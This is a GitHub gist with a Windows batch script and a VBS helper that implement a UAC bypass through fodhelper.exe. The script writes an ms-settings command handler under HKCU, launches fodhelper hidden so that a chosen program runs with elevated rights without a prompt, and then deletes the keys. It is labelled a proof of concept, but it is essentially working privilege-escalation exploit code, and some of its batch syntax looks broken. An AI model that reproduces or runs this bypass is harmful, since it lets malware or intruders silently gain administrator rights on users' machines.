Skip to content

Instantly share code, notes, and snippets.

@tnhung2011
Last active March 15, 2022 09:19
Show Gist options
  • Save tnhung2011/fc1d23ccf7a23ab31d5886d36999ffa1 to your computer and use it in GitHub Desktop.
Save tnhung2011/fc1d23ccf7a23ab31d5886d36999ffa1 to your computer and use it in GitHub Desktop.
A Batch concept of a vulnerability in Windows 10 discovered by Cristian B. (Please note: This is a Proof of Concept and is not intended for illegal usage!)
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
@echo off
rem Other bindings:
rem - https://github.com/winscripting/UAC-bypass
rem - https://gist.github.com/tommelo/07dacce52664a35d2938a55d96bc8ac5
set null=
set program=%*
if exists %program% (
rem Create registry structure
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d %null%
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v (Default) /t REG_SZ /d %program%
rem Perform the bypass
wscript.exe %~dp0\cmdhid.vbs %systemroot%\System32\fodhelper.exe
rem Remove registry structure
timeout 3
reg delete /f HKCU\Software\Classes\ms-settings\
) else (
echo %~nx0: The specified path doesn't exist!
)
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment